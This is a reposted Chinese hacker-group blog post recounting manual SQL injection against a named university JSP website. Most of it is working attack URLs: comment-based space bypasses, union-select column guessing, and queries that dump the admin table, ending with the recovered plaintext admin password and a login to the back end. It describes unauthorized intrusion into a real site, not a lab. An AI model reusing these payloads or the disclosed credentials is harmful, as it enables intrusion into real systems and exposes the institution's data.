记一次曲折的jsp手工半盲注入
作者:YoCo Smart
來自:習科信息技術 ***作戰營
::{ Silic Group Hacker Army }::
site:http://blackbap.org
前些日子(似乎很久很久以前),小X在群里發了一個太平洋汽車網站的注入,jsp的,安敏似乎問過她似乎也問過我,還有誰的,longlong ago了,記不清了,只記得當時安敏似乎對jsp注入很驚奇,或者說。。。總之印象很深。在補充書的最后素材時,終于功夫不負有心人,找到了jsp絕好的實例,這里放出來分享下。網上jsp注入的實例似乎并不多,能拿來練的似乎就沒有。這里放一個,供大家研究和學習。
jsp的注入沒什么特殊,注入并不取決于腳本,而是取決于數據庫的類型。例如這個jsp網站就用的MySql數據庫,說實話,如果他用Oracle呵呵我還真拿不下來。
好了,回到正文。
我找到的第一個注入點在這里:
http://cie.zjgsu.edu.cn/cie/web/newDetail.do?newsid=599
加了引號后出錯,加+and+1=1提示
?
and和1連一起了。那么把+換成/**/再來。這次返回的是正常頁面了,呵呵,真是樂死我了,居然用MySql數據庫。繼續1=2訪問回顯錯誤500頁面。好了,宣布開始猜字段顯示位。我order by了半天,他一直一個提示:
http://cie.zjgsu.edu.cn/cie/web/newDetail.do?newsid=599/**/and/**/1=1/**/union/**/select/**/*/**/order/**/by/**/0
ORDER BY 子句中的位置號 0 超過了選擇列表中項數目。
http://cie.zjgsu.edu.cn/cie/web/newDetail.do?newsid=599/**/and/**/1=1/**/union/**/select/**/*/**/order/**/by/**/10000000
ORDER BY 子句中的位置號 10000000 超過了選擇列表中項數目。
難道是我的用法不對?好吧,我承認學藝不精,你狠,沒關系,我比你還狠,來,咱們union select一個一個來,復制“,1”重復粘帖回車粘帖回車。。。。
http://cie.zjgsu.edu.cn/cie/web/newDetail.do?newsid=599/**/and/**/1=1/**/union/**/select/**/1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1
我暈,都這么長了,還是提示:
?
這接暈死。。。這么狠,看來這個注入點不能用啊。
沒轍,谷歌一下,看看人品怎樣。搜索:
site:cie.zjgsu.edu.cn inurl:.jsp?
還不少呢。選來選去,最后選了這個地方:
http://cie.zjgsu.edu.cn/cie/web/teacher_detail.jsp?id=130
加引號回車訪問,無錯誤回顯,但是頁面到中間就斷了。
本以為是網速不行,中間丟包了。但是網速很快,刷新連眨眼都不用就顯示完頁面內容了,刷新了好幾次一直都這樣斷。重新找了幾個頁面變量后面加引號竟然都這樣。而且是一個地方段掉的
變量后面加/**/and/**/1=1就又返回正常,但是如果/**/and/**/1=2就又斷了。第一次見到這么詭異的注入點。要么就是有錯誤回顯,要么就沒有,空白,哪還有html標簽傳到一半的一半“<”就斷了的?
如果這是注入點,那么成功率可能不高,要么跟上一個一樣,出不來字段數,要么這就不是一個注入點。
不管那么多,死馬當活馬醫先。
union select繼續猜字段數,order by不能用,加一個回車加一個回車,重復到27個,嘿,居然顯示正常頁面了,內牛滿面啊。。。
http://cie.zjgsu.edu.cn/cie/web/teacher_detail.jsp?id=130/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
這不,顯示位就出來了?隨手+隨習慣,來了個/**/from/**/admin,呵,居然又是正常頁面,傳說中的人品爆發降臨在我身上了?那么from /**/MySql.user呢。。暈,又是截斷了的頁面。看來注入點可用,admin字段存在,MySql數據庫無權。
字段名還懶得猜,隨手想先看看數據庫名,這一看不要緊,差點沒雷死我。
隨便找個顯示位,方上database()居然又出現錯誤截斷。。。哇靠!那么hex(database())呢。。。還是錯誤。郁悶。
既然database函數不能用,老老實實猜吧。
進入管理入口,看源代碼:
?
?
?
?
?
我猜管理員的字段名可能是aname和apsw
不過最后證明,我的猜測是錯的。這個一會兒說。先說一段小插曲。
猜字段名的時候,發現字段中所有的函數都不能用。
load_file、concat、database()、user()、。。。。。任何一個都是錯誤的,哪怕我來了一個hex(id)都顯示錯誤。。我直接無語掉
正當我“自暴自棄”的時候,突然發現靈感一現char(33)填入某字段,頁面顯示出了不起眼的"!",我暈。。。那么hex(5f)。。哦,居然顯示出來了。
看來字段被限制了執行XX,管理員的杰作。
既然char(33)能顯示,那么如果字段名正確估計也能顯示,填入字段名為id,居然顯示出來字段數為5。
那么繼續,猜幾個常用的字段名,管理員字段數居然出來了。管理員字段沒我想的那么復雜,user和pass而已
4號位置填user,14號位置填上pass回車訪問
http://cie.zjgsu.edu.cn/cie/web/teacher_detail.jsp?id=130/**/and/**/1=2/**/union/**/select/**/1,2,3,user,5,6,7,8,9,10,11,12,13,pass,15,16,17,18,19,20,21,22,23,24,25,26,27/**/from/**/admin
就出來答案了
dbo和83088309明文啊。可是去后臺登陸,這個卻顯示錯誤。我大概猜到是什么原因了,估計是序號的問題。
原來的注入語句后面加個where條件句/**/where/**/id=5并且把原來語句中的user換回數字,訪問
http://cie.zjgsu.edu.cn/cie/web/teacher_detail.jsp?id=130/**/and/**/1=2/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,pass,15,16,17,18,19,20,21,22,23,24,25,26,27/**/from/**/admin/**/where/**/id=5
好了,這次密碼出來了:adminxxlab
密碼出來了,用戶名照樣搬就可以了,把pass換成user訪問。
一開始我想當然的認為user字段就是管理員的名稱字段,但是根據5樓所說,這個確實不是登錄名字段,登錄名稱字段另有其他。╮(╯_╰)╭無語了。以為是另成,當時并沒深究下去,剛剛來看了5樓說的,當時確實是自己想當然的犯了迷糊,這里特此更正下。
不過看這個密碼不用注都能猜到,用戶名就是admin
后臺登陸,瀑布汗,居然清一色的eweb。看源代碼,應該是有人更早就進來過了,把上傳組件部分注釋掉了
轉載于:https://blog.51cto.com/pnig0s1992/340250
總結
以上是生活随笔為你收集整理的记一次曲折的jsp手工半盲注入的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 总是梦到男友出轨预示什么
- 下一篇: Silverlight 4新控件Pivo